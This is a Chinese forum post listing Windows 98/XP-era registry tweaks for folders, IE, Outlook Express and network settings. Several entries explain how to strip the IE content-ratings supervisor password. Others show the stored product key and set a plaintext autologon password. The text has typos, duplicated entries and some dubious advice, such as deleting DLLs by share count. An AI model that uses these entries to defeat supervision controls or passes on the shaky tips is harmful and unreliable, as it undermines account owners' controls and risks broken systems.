  成功啟動Windows後,註冊表將恢復到上次成功啟動計算機時的狀態。選擇「最後一次正確的配置」 是解決從問題(如新添加的驅動程序與硬件不相符)中恢復系統的一種方法,但是它不能解決由於驅動程序或文件被損壞或丟失所導致的問題。而且Windows只還原註冊表頂HKLM\System\CurrentControlset 中的信息,任何在其它註冊表項中所做的更改均保持不變。

一、註冊表基礎:

(一)********系統文件夾:*********

名稱 路徑 含義
AppData C:\Windows\Application Data 應用程序
Cache C:\Windows\Temporary Internet Files 瀏覽器緩存
Cookies C:\Windows\Cookies
Desktop Desktop 桌面
Favorites Favorites 收藏夾
Fonts Fonts 字體
History History 歷史文件夾
NetHood NetHood 網上鄰居
Personal C:\My Documents 文檔
PrintHood PrintHood 打印機
Program Start Menu\Programs 程序
Recent Recent 文檔
SendTo SendTo 發送到
Start Menu Start Menu 開始菜單
Startup Start Menu\Programs\啟動 啟動組
Templates Temp 臨時文件夾

******當需要修改這些系統文件夾的路徑時,只需進入註冊表的HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 中修改相應的路徑即可。


(二)********系統特殊的文件夾*********

在我們的桌面上或其他地方有一些文件夾並不是真正的文件夾,它們只是一個用來顯示窗口文件夾內容的OLE對象,如「計算機、「控制面板」等等,它們都有一個系統默認的類ID類標識,windows在註冊表的HKEY_CLASSES_ROOT\CLSID下定義這些文件夾 類ID 說明

Control Panel {21EC2020-3AEA-1069-A2DD-08002B30309D} 控制面板
Dial-Up Networking {992CFFA0-F557-101A-88EC-00DD010CCC48} 撥號網絡
Internet Explorer {BFB23B42-E3F0-101B-8488-00AA003E56F8} 瀏覽器
My Computer {20D04FE0-3AEA-1069-A2D8-08002B30309D} 電腦
Network Neighborhood {208D2C60-3AEA-1069-A2D7-08002B30309D} 網上鄰居
Printers {2227A280-3AEA-1069-A2DE-08002B30309D} 打印機
Recycle Bin {645FF040-5081-101B-9F08-00AA002F984E} 回收站
Scheduled Tasks {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 計劃任務
My Documents {450D8FBA-AD25-11D0-98A8-0800361B1103} 文檔
URLHistory Folder {FF393560-C2A7-11CF-BFF4-444553540000} URL歷史

(三)*************文件或其他對象的完:*************

完是一個文件或對象的標識。對於一個ICO文件只有一個唯一的完, 可以用「路徑\完文件名」來指示該文件的完;對於EXE、DLL等文件,它們可能要包含不止一個完,這時就需要有一個索引標誌來指明是第幾個完,可以用「路徑\文件名,索引號」的形式來指示該文件的完。

如果要修改系統文件夾的完,只需進入註冊表的HKEY_CLASSES_ROOT\CLSID中,查找到系統文件夾的類ID,然後修改 DefaultIcon中的完文件路徑即可;如果要修改其他文件的默認完則需要在HKEY_CLASSES_ROOT\CLSID\"文件類型"\DefaultIcon中修改完文件的路徑。

(四)***************驅動器的自動運行功能************

打開CDROM的自動運行功能並且放入可以自動運行的光盤時,光盤上的程序會自動運行,那麼其他的諸入硬盤、移動盤等是否也可以自動運行哪?在註冊表的KEY_USERS\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer下可以看到有一個NoDriveTypeAutoRun的值項,其中的值就指明了可以自動運行的驅動器。該值項是一個4字節的二進制值,第一字節的每位對應於不同的驅動器,如果對應位置為「1」則表示關閉自動運行功能,如果對應位置為「0」則表示打開自動運行功能。下表是各位對應的驅動器類型
第0位:未知驅動器 第2位:可移動驅動器 第3位:硬盤
第4位:遠程驅動器 第5位:CDROM驅動器 第6位:RAM驅動器


二、winxp系統註冊表應用

(一)**************系統****************

作 用:刪除系統無用的動態鏈接庫(DLL文件)
路 徑:HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLL
鍵值名稱:
數據類型:
鍵 值:每個DLL文件的鍵值說明此DLL被幾個應用程序共享
備 注:若為"01 00 00 00"則此DLL文件被一個應用程序共享。若為 "00 00 00 00"則該DLL文件對系統不起作用,說明它是一個垃圾文件,刪除該鍵值,並且記下 這個 DLL文件名,從 \windows\system文件夾中將該DLL文件刪除。

作 用:你的名字放入系統任務欄
路 徑:HKEY_CURRENT_USER\Control Panel\International
鍵值名稱:鍵值:sTimeFormat="HH:mm:-Ss tt",s1159="CFAN",s2359="HELLO"
數據類型:
鍵 值:說明:12點之前,在系統任務欄中顯示CFAN,之後則顯示HELLO,可任意設置以達到自己的效果


作 用:在每次退出系統時,自動清除文檔菜單中的歷史記錄
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
鍵值名稱:"ClearRecentDocsonExit"
數據類型:十六進制
鍵 值:01,00,00,00


作 用:禁止"系統"中出現"設備管理器"選項
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
鍵值名稱:NoDevMgrPage
數據類型WORD
鍵 值:1


作 用:禁止"系統"中出現"文件系統"選項
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
鍵值名稱:NoFileSysPage
數據類型WORD
鍵 值:1


作 用:禁止"系統"中出現"虛擬內存"選項
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
鍵值名稱:NoVirtMemPage
數據類型WORD
鍵 值:1


作 用:禁止"系統"中出現"硬件配置文件"選項
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
鍵值名稱:NoConfigPage
數據類型:DWORD
鍵 值:1


作 用:禁止在"系統屬*"中出現"設備管理器"的菜單
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
鍵值名稱:新建 "NoDevMgrPage"
數據類型:DWORD
鍵 值:設其值為"1"


作 用:禁止在"系統屬*"中出現"文件系統"的菜單
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
鍵值名稱:新建 "NoFileSysPage"
數據類型:DWORD
鍵 值:設其值為"1"


作 用:禁止在"系統屬*"中出現"虛擬內存"的菜單
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
鍵值名稱:新建 "NoVirtMemPage"
數據類型:DWORD
鍵 值:設其值為"1"


作 用:禁止在"系統屬*"中出現"硬件配置文件"的菜單
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
鍵值名稱:新建 "NoConfigPage"
數據類型:DWORD
鍵 值:設其值為"1"


作 用:改變系統的字體
路 徑:HKEY_LOCAL_MACHINE\config\0001\Display\settings
鍵值名稱:fonts.fon
數據類型:
鍵 值:默認vgasys.fon


作 用:設置用軟盤快速啟動系統的功能
路 徑:HKEY_LOCAL_MACHINE\Config\0001\Enum\Bios\*PNP0700\0B
鍵值名稱:FloppyFastBoost
數據類型:
鍵 值:值為01 00 00 00即可用軟盤快速啟動系統


作 用:系統不能訪問硬盤
路 徑:HKEY_LOCAL_MACHINE\Enum\PCI
鍵值名稱:ChannelOptions
數據類型:hex
鍵 值:2


作 用:查看系統分配給光驅的可用盤符
路 徑:HKEY_LOCAL_MACHINE\Enum\SCSI
鍵值名稱:找到字符串UserDriveLetterAssignment
數據類型:
鍵 值:其值即表示系統分配給光驅的可用盤符,如果為HZ表示從H到Z可以給光驅使用。


作 用:在系統屬*裡顯示更多的CPU信息
路 徑:HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0
鍵值名稱:"VendorIdentifier"
數據類型:
鍵 值:"Genuine Intel"(注意空格)


作 用:為系統增加啟動時自動加載的程序
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\\Microsoft\Windows\CurrentVersion\Run
鍵值名稱:新建主鍵,名自定
數據類型:
鍵 值:其值為"要執行文件的路徑及文件名"


作 用:修改系統版權信息
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\DEVEOPER\SETUP
鍵值名稱:想修改的鍵名
數據類型:字符串
鍵 值:輸入修改值


作 用:查找系統的安裝註冊碼
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
鍵值名稱roductKey
數據類型:
鍵 值:值即是系統安裝時必不可少的註冊碼。


作 用:讓系統自動運行一次某個程序
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
鍵值名稱:新建主鍵
數據類型:
鍵 值:其值為"要執行文件的路徑及文件名"


作 用:Windows系統各目錄位置
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
鍵值名稱:
數據類型:
鍵 值:


作 用:系統可用盤符
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Currentversion\setup
鍵值名稱:lastdrive
數據類型:
鍵 值:z


作 用:開機時自動登錄系統
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
鍵值名稱:新建 "AutoAdminLogon" "DefaultPassword" "DefaultUserName"
數據類型:字符串
鍵 值:其值設為"1", 登錄時的密碼 , 登錄時所用的用戶名


作 用:讓windows98系統自動登錄
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
鍵值名稱:新建AutoAdminLogon DefaultUserName DefaultPassword
數據類型:字符串
鍵 值:鍵值設為1,默認的登錄名,默認的口令,
作 用:優化文件系統
路 徑:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem
鍵值名稱:新建 "ConfigFileAllocSize"
數據類型:DWORD
鍵 值:設為"1f4"


作 用:系統使用語言
路 徑:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
鍵值名稱:默認值
數據類型:
鍵 值:"00000804"(簡體中文),"00000404"(繁體中文),"00000411"(日文),"00000412"(韓文),"00000409"(美國英語)


作 用:查看系統中的16位和32位.dll文件
路 徑:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager
鍵值名稱:"Known16DLLs"和"KnownDLLs"
數據類型:
鍵 值:分別包括了系統中的16位和32位.dll文件,用戶可以對應查找。


作 用:查看系統中的16位和32位dll文件
路 徑:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager
鍵值名稱:"Known16DLLs"和"KnownDLLs"分別包含了系統中的16位和32位.dll文件,用戶
可以對應查找
數據類型:
鍵 值:


作 用:推出系統時清除文檔中的歷史記錄
路 徑:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
鍵值名稱:新建ClearRecentDocsonExit
數據類型:二進制
鍵 值:值為"01 00 00 00"


(二)*****************網絡***************


作 用:設置IE的自動撥號功能
路 徑:HKEY_CURRENT_CONFIG\Software\Windows\CurrentVersion\Internet Settings
鍵值名稱:"EnableAutoDial"
數據類型:二進制
鍵 值:值改為01 00 00 00

作 用:允許IE使用代理服務器
路 徑:HKEY_CURRENT_CONFIG\Software\Windows\CurrentVersion\Internet Settings
鍵值名稱:"roxyEnable
數據類型:DWORD
鍵 值:值改為01 00 00 00

作 用:給IE5添加多個HTML編輯器
路 徑:HKEY_CURRENT_USER\ Software\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
鍵值名稱:command
鍵 值:將其值修改為DreamWeaver的絕對地址,並加上%1
備 注:如"c:\program files\macromedia\ dreamweaver 2\dreamweaver.exe %1"。

作 用:更改Outlook Express 的標題欄
路 徑:HKEY_CURRENT_USER\Identities\{4C44D002-7BCF-11D3-9957-AB53DA238B0C}\Software\Microsoft\Outlook Express\5.0
鍵值名稱:新建"windowTitle"
數據類型:字符串
鍵 值:輸入你想要的名稱,如"XX的信箱"

作 用:更改Outlook Express5.0信箱存放路徑
路 徑:HKEY_CURRENT_USER\Identities\{4C44D002-7BCF-11D3-9957-AB53DA238B0C}\Software\Microsoft\Outlook Express\5.0
鍵值名稱:"Store Root"
數據類型:字符串
鍵 值:修改為要修改的路徑。

作 用:用Outlook Express收信時跳過無法收取的帳號
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager
鍵值名稱:展開那個須跳過的帳號所對應的子鍵,其下"OP3 Skip Account"
數據類型:DWORD
鍵 值:值由0改為1

作 用:清除IE網址輸入下拉列表中的網址
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
鍵值名稱:TypedURLs
鍵 值:刪除其下對應的網址即可

作 用:設置IE的缺省下載目錄
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
鍵值名稱:DownLoadDirectory
鍵 值:修改其值

作 用:在IE中顯示URL地址全名
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
鍵值名稱:Show_FullURL
鍵 值:值改為Yes

作 用:退出IE時保存歷史網址內容
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\main
鍵值名稱:Save_Session_History_On_Exit
鍵 值:值改為Yes

作 用:修改IE4的搜索引擎
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl
鍵 值:把"默認"改為你定義的搜索引擎,如http://gbchinese.yahoo.com/ ;

作 用:改變IE的背景位圖
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar
鍵值名稱:新建BackBitmap
數據類型:字符串
鍵 值:"BMP文件路徑"

作 用:禁止Outlook Express彩色消息背景
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Internet Mail and News
鍵值名稱:ColorCycle
數據類型:字符串
鍵 值:0

作 用:更改Outlook Express的郵件存放目錄
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Outlook Express
鍵值名稱:Store Root
鍵 值:值改為所需的文件路徑即可

作 用:禁止Outlook Express的啟動畫面
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Outlook Express
鍵值名稱:NoSplash
數據類型:DWORD
鍵 值:1

作 用:Outlook Express的標題欄
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Outlook Express\
鍵值名稱:WindowTitle
數據類型:字符串值

作 用:刪除IE
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
鍵值名稱:NoInternetIcon
數據類型:DWORD
鍵 值:1

作 用:如何重裝IE
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer
鍵值名稱:Version
數據類型:字符串
鍵 值:表示IE的版本號,改小一點兒就行了

作 用:定制IE地址
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLS
鍵值名稱:新值#1
數據類型:
鍵 值:改為你要給指向的網頁(網址)取的名字。在"鍵值"欄中輸入網址
備 注:

作 用:定制IE標題
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
鍵值名稱:新建"window Title"
數據類型:字符串
鍵 值:串值內容改為你想要的文字
備 注:

作 用:增加IE4 的自動搜索功能
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\UrlTemplate
鍵值名稱:新建字符串,然後輸入一個順序號
數據類型:
鍵 值:輸入你想要的自動搜索網址的其它部分的字符,比如支持中國的域名是:www.%s.com.cn。
備 注:

作 用:修改IE5.0的搜索引擎
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search
鍵值名稱:
數據類型:
鍵 值:把"CustomizeSearch"、"SearchAssistant"改為你定義的搜索引擎
備 注:

作 用:更改IE4.0的安全口令
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
鍵值名稱:Ratings子鍵
數據類型:
鍵 值:刪除
備 注:

作 用:IE的分級審查口令
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings
鍵值名稱:用鼠標選中右半窗口裡的名稱記錄,按下Del鍵進行刪除
數據類型:
鍵 值:
備 注:

作 用:巧解IE的分級審查口令
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings
鍵值名稱:右半窗口裡的名稱記錄
數據類型:
鍵 值:刪除
備 注:

作 用:刪除IE4.0的安全口令
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies]
鍵值名稱:Ratings
數據類型:
鍵 值:刪除
備 注:

作 用:IE慢慢刷新
路 徑:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Control\
鍵值名稱:Update
數據類型:
鍵 值:1
備 注:

作 用:IE起始網頁位置
路 徑:HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main
鍵值名稱:-Sart page
數據類型:
鍵 值:更改其下的鍵值即可完成對默認主頁的更改
備 注:

作 用:IE脫機無法登錄顯示的網頁
路 徑:HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main
鍵值名稱ocal Page
數據類型:
鍵 值:改成你想要的頁就可以成為當你脫機瀏覽一個未去過的網頁時所顯示的頁面
備 注:

作 用:IE的地址歷史記錄位置
路 徑:HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\TypedURLs
鍵值名稱:刪除其下的所有的鍵名和鍵值!重啟後你的IE 地址欄就不會再有什麼歷史地址了
數據類型:
鍵 值:
備 注:

作 用:Outlook Express郵件目錄
路 徑:HKEY_USERS\.DEFAULT\Software\Microsoft\Outlook Express
鍵值名稱:Store Root
數據類型:
鍵 值:
備 注:

作 用:Outlook Express郵件簽名
路 徑:HKEY_USERS\.DEFAULT\Software\Microsoft\Outlook Express\Mail
鍵值名稱:Signature Text
數據類型:
鍵 值:
備 注:

作 用:Outlook Express的配置全面備份
路 徑:HKEY_USERS\.DEFAULT\SOFTWARE\MICROSOFT\OUTLOOK EXPRESS\MAIL\INBOX RULES
鍵值名稱:
數據類型:
鍵 值:導出註冊表文件
備 注:

作 用:Outlook Express新聞貼簽名
路 徑:HKEY_USERS\.DEFAULT\Software\Microsoft\Outlook Express\News
鍵值名稱:Signature Text
數據類型:
鍵 值:
備 注:

作 用:Outlook Express的Cache目錄
路 徑:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\Shell Folders
鍵值名稱:Cache
數據類型:
鍵 值:
備 注:

作 用:Outlook Express的Cookies的目錄
路 徑:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\Shell Folders
鍵值名稱:Cookies
數據類型:
鍵 值:
備 注:

作 用:Outlook Express的歷史目錄
路 徑:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\Shell Folders
鍵值名稱:History
數據類型:
鍵 值:
備 注:

作 用:清理訪問"網絡鄰居"後留下的信息
路 徑:HEKY_CURRENT_USER\Network\Recent
鍵值名稱:在右窗格中選擇要刪除的選項
數據類型:
鍵 值:刪除
備 注:

作 用:修改"撥號網絡"的名稱
路 徑:HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48
鍵值名稱:"默認"
數據類型:
鍵 值:值更改為需要的鍵值
備 注:

作 用:為網絡螞蟻的下載過程加入提示聲
路 徑:HKEY_CURRENT_USER\AppEvents\Schemes\App\Netants
鍵值名稱:其下有NAAddFile、NADownloadFail和NADownloadSuccess三個子鍵,分別表示Netants中加入下載文件、下載失敗和下載成功這三個事件。只要將其下的.current子鍵的"默認"鍵值改為自己喜歡的wav文件即可
數據類型:
鍵 值:
備 注:

作 用:網頁歷史紀錄
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
鍵值名稱:History
數據類型:
鍵 值:
備 注:

作 用:隱藏"網上鄰居"中的"整個網絡"
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
鍵值名稱:新建NoEntireNetwork
數據類型:DWORD
鍵 值:值設為"1"時為有效
備 注:

作 用:禁止使用"網上鄰居"
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
鍵值名稱:"NoNetHood"
數據類型:DWORD
鍵 值:00000001
備 注:

作 用:隱藏"網上鄰居"中的工作站顯示
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Networkr
鍵值名稱:新建NoWorkgroupContents
數據類型:DWORD
鍵 值:值設為"1"時為有效
備 注:

作 用:禁止更改網絡設置
路 徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
鍵值名稱:NoNetSetup
數據類型:DWORD
鍵 值:1
備 注:

作 用:從Netscape 中清除曾到過的網址
路 徑:HKEY_CURRENT_USER\Software\Netscape\NetscapeNavigator\URLHistory
鍵值名稱:在右窗格中選擇要刪除的網址選項
數據類型:
鍵 值:刪除
備 注:

作 用:隱藏"網上鄰居"
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace]
鍵值名稱:{208D2C60-3AEA-1069-A2D7-08002B30309D}
數據類型:
鍵 值:刪除
備 注:

作 用:在"電腦"中顯示"撥號網絡"
路 徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\MyComputer\NameSpace
鍵值名稱:新建"{992CFFA0-F557-101A-88EC-00DD010CCC48}",在右邊的窗口中創建一個字符
串值:"默認"
數據類型:字符串
鍵 值:值為"撥號網絡"。
備 注:

TOP

發新話題

本站所有圖文均屬網友發表,僅代表作者的觀點與本站無關,如有侵權請通知版主會盡快刪除。